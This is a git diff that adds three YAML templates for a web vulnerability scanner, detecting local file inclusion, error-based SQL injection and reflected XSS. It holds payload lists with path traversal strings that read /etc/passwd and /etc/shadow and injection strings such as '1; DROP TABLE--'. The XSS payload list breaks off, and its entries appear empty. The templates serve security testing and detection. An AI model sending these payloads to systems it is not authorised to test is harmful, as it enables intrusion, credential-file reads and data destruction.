diff --git a/modules/http/lfi-basic.yaml b/modules/http/lfi-basic.yaml
new file mode 100644
index 0000000..f12bac6
--- /dev/null
+++ b/modules/http/lfi-basic.yaml
@@ -0,0 +1,49 @@
+# Basic LFI Detection Module
+
+id: lfi-basic
+info:
+ name: Basic LFI Detection
+ author: sif
+ severity: high
+ description: Detects basic Local File Inclusion vulnerabilities
+ tags: [lfi, injection, file-inclusion, owasp-top10]
+
+type: http
+
+http:
+ method: GET
+ paths:
+ - "{{BaseURL}}/?file={{payload}}"
+ - "{{BaseURL}}/?page={{payload}}"
+ - "{{BaseURL}}/?path={{payload}}"
+ - "{{BaseURL}}/?include={{payload}}"
+ - "{{BaseURL}}/?doc={{payload}}"
+ - "{{BaseURL}}/?template={{payload}}"
+
+ payloads:
+ - "../../../../../../../etc/passwd"
+ - "....//....//....//....//....//etc/passwd"
+ - "..%2f..%2f..%2f..%2f..%2fetc/passwd"
+ - "/etc/passwd"
+ - "../../../../../../../etc/shadow"
+ - "../../../../../../../windows/system32/drivers/etc/hosts"
+
+ threads: 10
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+ - "daemon:.*:1:1:"
+ - "nobody:.*:65534:"
+ - "127\\.0\\.0\\.1\\s+localhost"
+ condition: or
+
+ extractors:
+ - type: regex
+ name: detected_file
+ part: body
+ regex:
+ - "(root|daemon|nobody):.*:[0-9]+:[0-9]+:"
+ group: 0
diff --git a/modules/http/sqli-error.yaml b/modules/http/sqli-error.yaml
new file mode 100644
index 0000000..2b69cf8
--- /dev/null
+++ b/modules/http/sqli-error.yaml
@@ -0,0 +1,66 @@
+# SQL Injection Error-Based Detection Module
+
+id: sqli-error-based
+info:
+ name: SQL Injection (Error-Based)
+ author: sif
+ severity: high
+ description: Detects SQL injection via database error messages
+ tags: [sqli, injection, database, owasp-top10]
+
+type: http
+
+http:
+ method: GET
+ paths:
+ - "{{BaseURL}}/?id={{payload}}"
+ - "{{BaseURL}}/?user={{payload}}"
+ - "{{BaseURL}}/?search={{payload}}"
+ - "{{BaseURL}}/?q={{payload}}"
+ - "{{BaseURL}}/?query={{payload}}"
+ - "{{BaseURL}}/?cat={{payload}}"
+
+ payloads:
+ - "'"
+ - "''"
+ - "1'"
+ - "1' OR '1'='1"
+ - "1' OR '1'='1'--"
+ - "1' OR '1'='1'/*"
+ - "1; DROP TABLE--"
+ - "' UNION SELECT NULL--"
+ - "1 AND 1=1"
+ - "1 AND 1=2"
+
+ threads: 10
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "SQL syntax.*MySQL"
+ - "Warning.*mysql_"
+ - "MySqlException"
+ - "valid MySQL result"
+ - "ORA-[0-9]+"
+ - "Oracle.*Driver"
+ - "Oracle.*Error"
+ - "PostgreSQL.*ERROR"
+ - "pg_query.*failed"
+ - "Microsoft SQL Server"
+ - "ODBC SQL Server Driver"
+ - "SQLite3::"
+ - "sqlite_query"
+ - "SQLite/JDBCDriver"
+ - "SQL Server.*Driver"
+ - "Unclosed quotation mark"
+ - "quoted string not properly terminated"
+ condition: or
+
+ extractors:
+ - type: regex
+ name: db_type
+ part: body
+ regex:
+ - "(MySQL|PostgreSQL|Oracle|MSSQL|SQLite|MariaDB)"
+ group: 1
diff --git a/modules/http/xss-reflected.yaml b/modules/http/xss-reflected.yaml
new file mode 100644
index 0000000..4d48774
--- /dev/null
+++ b/modules/http/xss-reflected.yaml
@@ -0,0 +1,41 @@
+# Reflected XSS Detection Module
+
+id: xss-reflected
+info:
+ name: Reflected XSS Detection
+ author: sif
+ severity: medium
+ description: Detects reflected Cross-Site Scripting vulnerabilities
+ tags: [xss, injection, javascript, owasp-top10]
+
+type: http
+
+http:
+ method: GET
+ paths:
+ - "{{BaseURL}}/?q={{payload}}"
+ - "{{BaseURL}}/?search={{payload}}"
+ - "{{BaseURL}}/?name={{payload}}"
+ - "{{BaseURL}}/?input={{payload}}"
+ - "{{BaseURL}}/?message={{payload}}"
+ - "{{BaseURL}}/?text={{payload}}"
+
+ payloads:
+ - ""
+ - "'>"
+ - "\">"
+ - "
"
+ - "